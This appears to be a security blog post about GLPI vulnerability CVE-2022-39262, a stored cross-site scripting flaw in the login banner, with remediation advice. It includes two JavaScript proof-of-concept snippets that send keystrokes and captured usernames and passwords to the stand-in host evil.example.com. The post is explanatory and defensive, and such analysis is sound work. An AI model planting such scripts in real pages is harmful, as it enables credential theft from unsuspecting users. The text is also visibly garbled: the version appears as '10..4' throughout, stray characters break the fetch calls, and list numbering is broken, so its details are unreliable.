If you manage IT assets, you probably know GLPI (Gestionnaire Libre de Parc Informatique). It’s a popular free web-based solution for tracking IT inventory, managing tickets, and automating related processes. But in October 2022, it was confirmed that GLPI had a serious security flaw: CVE-2022-39262, a vulnerability that could let attackers steal credentials right from the login page – sometimes without even needing access to the system itself.
Let’s break down this vulnerability, see a proof-of-concept, and explain how you can keep your systems safe.
What is GLPI?
GLPI is an open-source IT asset management and service desk tool. Features include:
Inventory (hardware, software)
- Helpdesk / ticketing
User portals and self-service features
GLPI is widely used by universities, businesses, and organizations worldwide.
What’s the Vulnerability? (CVE-2022-39262)
Short version:
GLPI allows administrators to set a custom rich-text (HTML) message on the login screen – often used to display "Welcome" banners, policies, maintenance notifications, and so on.
Problem:
Before version 10..4, GLPI failed to properly sanitize this field. As a result, anyone with access to define the message (admins) could sneak in malicious JavaScript code. That code would execute when ANYONE visited the login page.
This flaw opened the door to
- Credential theft: Stealing usernames & passwords from browsers using keyloggers or forms sniffers
Technical Details with Code Example
Here’s what the affected setting looks like in the GLPI administration panel (Setup ➞ General ➞ Login banner):
<!-- Example of malicious input in the rich-text editor: -->
<b>Welcome! Please log in.</b>
<script>
// Simple keylogger: sends keystrokes to attacker's server
document.querySelectorAll('input').forEach(function(input) {
input.addEventListener('keyup', function() {
fetch('https://evil.example.com/keys';, {
method: 'POST',
body: JSON.stringify({key: this.value}),
headers: {'Content-Type': 'application/json'}
});
});
});
</script>
Once saved, this code runs on every browser that loads the login page!
Real Life Exploit Example
Let’s say an attacker has access to a low-privileged admin account, or finds a way to inject content into the login page (via phishing or password spraying).
Whenever a user visits the login page and types in their credentials, every keystroke gets sent to the attacker’s server.
Capture credentials
// Credential stealing form hook
document.querySelector('form').addEventListener('submit', function(event) {
let username = document.querySelector('input[name="login_name"]').value;
let password = document.querySelector('input[name="login_password"]').value;
fetch('https://evil.example.com/creds';, {
method: 'POST',
body: JSON.stringify({user: username, pass: password}),
credentials: 'omit',
headers: {'Content-Type': 'application/json'}
});
});
This script quietly copies usernames and passwords, sending them offsite when anyone tries to log in.
Who Is Affected?
GLPI versions before 10..4 are vulnerable.
Administrators with access to edit the login banner can abuse this. In rare cases, other vulnerabilities could let attackers escalate to this privilege level.
> Severity:
> Most CVE databases score this as a medium-to-high risk, since it requires admin rights to inject code. But, as shown, in organizations with many admin users, the impact can be critical.
How It Was Discovered
The issue was responsibly reported and tracked in the GLPI GitHub Security Advisory.
Patch announcement:
- GLPI 10..4 release notes
- CVE-2022-39262 on NVD
Remediation – What Should You Do?
Upgrade to GLPI version 10..4 or later.
The patch removes support for unsafe HTML content in the login banner and properly sanitizes all user input.
Backup your GLPI database and files.
2. Download version 10..4 (or latest) from the official website.
3. Follow the upgrade documentation.
Always sanitize rich-text input fields, especially those visible to users before authentication.
Stay safe, upgrade often, and keep an eye on software advisories for issues like this!
References
- GLPI Security Advisory GHSA-7hcc-wcvv-c2vh
- GLPI Release Notes 10..4
- National Vulnerability Database: CVE-2022-39262
- Official GLPI Project site
> Pro tip:
> If you found this post helpful, bookmark your vendor’s security advisories and review them every month!
Timeline
Published on: 11/03/2022 14:15:00 UTC
Last modified on: 11/03/2022 17:34:00 UTC